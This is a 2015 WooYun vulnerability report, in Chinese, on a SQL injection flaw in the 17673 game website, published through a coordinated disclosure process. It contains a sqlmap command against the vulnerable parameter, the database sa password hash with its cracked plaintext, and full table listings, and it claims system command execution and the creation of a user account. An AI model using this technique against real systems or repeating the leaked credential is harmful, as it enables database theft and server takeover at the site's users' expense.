当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157454

漏洞标题:17673游戏网SQL注入漏洞可执行系统命令

相关厂商:17673游戏网

漏洞作者: 路人甲

提交时间:2015-12-02 11:18

修复时间:2016-01-18 17:00

公开时间:2016-01-18 17:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-02: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

17673游戏网sa权限注入漏洞,可执行系统命令

详细说明:

注入点:
sqlmap测试:

获取sql server密码:
{lamb} sqlmap.py -u "**.**.**.**/app/game/gameuser.html?gname=1" --password
[19:37:13] [INFO] starting 4 processes
[19:38:45] [WARNING] no clear password(s) found
database management system users password hashes:
[*] sa [1]:
password hash: 0x01004086ceb66cbf0fbc32b1cd77a0072b87b3a125dcb44265e2
header: 0x0100
salt: 4086ceb6
mixedcase: 6cbf0fbc32b1cd77a0072b87b3a125dcb44265e2
密码hash破解得到:cjc780228

QQ截图20141208214620.jpg


Database: ghjie
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.KS_Digg | 398605 |
| dbo.KS_Article | 334523 |
| dbo.KS_LogScore | 324063 |
| dbo.KS_GuestReply | 291539 |
| dbo.KS_UploadFiles | 290440 |
| dbo.KS_ItemInfo | 160741 |
| dbo.KS_DiggList | 88380 |
| dbo.KS_User | 70482 |
| dbo.KS_GuestBook | 59276 |
| dbo.KS_Message | 32880 |
| dbo.so_gameuser | 31540 |
| dbo.KS_UserLog | 30811 |
| dbo.KS_BlogMessage | 22327 |
| dbo.KS_KeyWords | 17849 |
| dbo.KS_Comment | 17046 |
| dbo.KS_Log | 14542 |
| dbo.KS_MoodList | 12486 |
| dbo.KS_PromotedPlan | 9990 |
| dbo.hdVoteList | 8180 |
| dbo.hdDYRenVotelist | 3754 |
| dbo.KS_LogPoint | 3410 |
| dbo.KS_U_ghhy | 2077 |
| dbo.KS_ItemInfoR | 1629 |
| dbo.KS_U_game | 1564 |
| dbo.Xwhdmood | 1365 |
| dbo.fsdOrder | 1215 |
| dbo.KS_SiteCount | 946 |
| dbo.KS_BlogInfo | 795 |
| dbo.KS_U_yxcslb | 738 |
| dbo.KS_Label | 509 |
| dbo.KS_SpecialR | 507 |
| dbo.so_game | 460 |
| dbo.KS_PhotoVote | 417 |
| dbo.KS_BlogComment | 411 |
| dbo.KS_Friend | 407 |
| dbo.KS_Province | 389 |
| dbo.hdrwVoteList | 365 |
| dbo.KS_Photozp | 324 |
| dbo.KS_Blog | 272 |
| dbo.KS_PKGD | 272 |
| dbo.XwhdComment | 263 |
| dbo.KS_Class | 210 |
| dbo.KS_LogMoney | 201 |
| dbo.KS_Link | 159 |
| dbo.hdgonghuiInfo | 151 |
| dbo.KS_Field | 150 |
| dbo.KS_GuestCategory | 144 |
| dbo.KS_Job_Hyzw | 138 |
| dbo.KS_BlogVisitor | 134 |
| dbo.KS_UserCard | 100 |
| dbo.KS_U_yzk | 87 |
| dbo.hdDaiYanRen | 83 |
| dbo.KS_U_ghyx | 68 |
| dbo.KS_AskPosts1 | 66 |
| dbo.KS_UserMail | 63 |
| dbo.KS_Team | 57 |
| dbo.KS_TeamUsers | 57 |
| dbo.KS_LabelFolder | 52 |
| dbo.hdchshang | 51 |
| dbo.KS_AskFavorite | 48 |
| dbo.KS_GuestBoard | 42 |
| dbo.KS_Photoxc | 42 |
| dbo.KS_EnterPriseClass | 41 |
| dbo.KS_AskGrade | 36 |
| dbo.KS_JSFile | 35 |
| dbo.KS_U_zts | 32 |
| dbo.KS_AskTopic | 31 |
| dbo.KS_TeamTopic | 30 |
| dbo.KS_AskAnswer | 29 |
| dbo.hdrenwu | 27 |
| dbo.KS_Admin | 25 |
| dbo.KS_Special | 20 |
| dbo.KS_Template | 19 |
| dbo.KS_UserGroup | 19 |
| dbo.KS_WapTemplate | 19 |
| dbo.KS_Channel | 18 |
| dbo.KS_BlogType | 15 |
| dbo.KS_BlogTemplate | 14 |
| dbo.KS_Job_ZW | 14 |
| dbo.KS_PaymentPlat | 14 |
| dbo.KS_BlogClass | 11 |
| dbo.KS_FeedBack | 11 |
| dbo.KS_PhotoClass | 11 |
| dbo.KS_PKZT | 11 |
| dbo.KS_Favorite | 9 |
| dbo.KS_InnerLink | 9 |
| dbo.KS_AskZJ | 8 |
| dbo.KS_MallScore | 8 |
| dbo.KS_TeamClass | 8 |
| dbo.jj2046Order | 7 |
| dbo.KS_BlogMusic | 7 |
| dbo.KS_PaymentType | 7 |
| dbo.XwhdWebClass | 7 |
| dbo.KS_DownSer | 6 |
| dbo.KS_GQType | 6 |
| dbo.KS_GuestMedal | 6 |
| dbo.Xwgame | 6 |
| dbo.KS_DownLoad | 5 |
| dbo.KS_Vote | 5 |
| dbo.cmd | 4 |
| dbo.KS_AskClass | 4 |
| dbo.KS_Deliverytype | 4 |
| dbo.KS_Job_Template | 4 |
| dbo.KS_MallScoreOrder | 4 |
| dbo.KS_MoodProject | 4 |
| dbo.KS_LinkFolder | 3 |
| dbo.KS_Online | 3 |
| dbo.SpecialComment | 3 |
| dbo.fsdGhadmin | 2 |
| dbo.hdPrize | 2 |
| dbo.KS_ADPlace | 2 |
| dbo.KS_Advertise | 2 |
| dbo.KS_GuestComment | 2 |
| dbo.KS_MediaServer | 2 |
| dbo.KS_SpecialClass | 2 |
| dbo.KS_Announce | 1 |
| dbo.KS_Config | 1 |
| dbo.KS_DownParam | 1 |
| dbo.KS_Job_Letter | 1 |
| dbo.KS_Job_Resume | 1 |
| dbo.KS_LogEdays | 1 |
| dbo.KS_MovieParam | 1 |
| dbo.KS_Photo | 1 |
| dbo.KS_U_Exposure | 1 |
| dbo.KS_UserClass | 1 |
| dbo.KS_UserForm | 1 |
| dbo.Xwhdsys | 1 |
+--------------------------------------------------+---------+

Database: gamescomm
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.dl | 12447 |
| dbo.lianmeng | 808 |
+--------------------------------------------------+---------+

Database: wj
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.temp | 1 |
+--------------------------------------------------+---------+

Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.MSdbms_datatype_mapping | 325 |
| dbo.sysdatatypemappings | 325 |
| dbo.MSdbms_map | 248 |
| dbo.MSdatatype_mappings | 174 |
| dbo.MSdbms_datatype | 141 |
| dbo.backupfile | 24 |
| dbo.syscategories | 21 |
| dbo.backupfilegroup | 12 |
| dbo.backupset | 12 |
| dbo.restorefile | 12 |
| dbo.backupmediafamily | 11 |
| dbo.backupmediaset | 11 |
| dbo.syssubsystems | 10 |
| dbo.MSdbms | 7 |
| dbo.sysmail_configuration | 7 |
| dbo.restorefilegroup | 6 |
| dbo.restorehistory | 6 |
| dbo.sysdtscategories | 3 |
| dbo.sysdtspackagefolders90 | 2 |
| dbo.sysdbmaintplans | 1 |
| dbo.sysmail_servertype | 1 |
| dbo.sysoriginatingservers_view | 1 |
| dbo.systargetservers_view | 1 |
+--------------------------------------------------+---------+


近4万用户信息泄露,
执行系统命令:

QQ截图20141208214003.jpg


添加用户:

QQ截图20141208214758.jpg


延时注入确实有点慢,太花时间了。未果。。。

漏洞证明:

见说明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-12-04 16:58

厂商回复:

暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无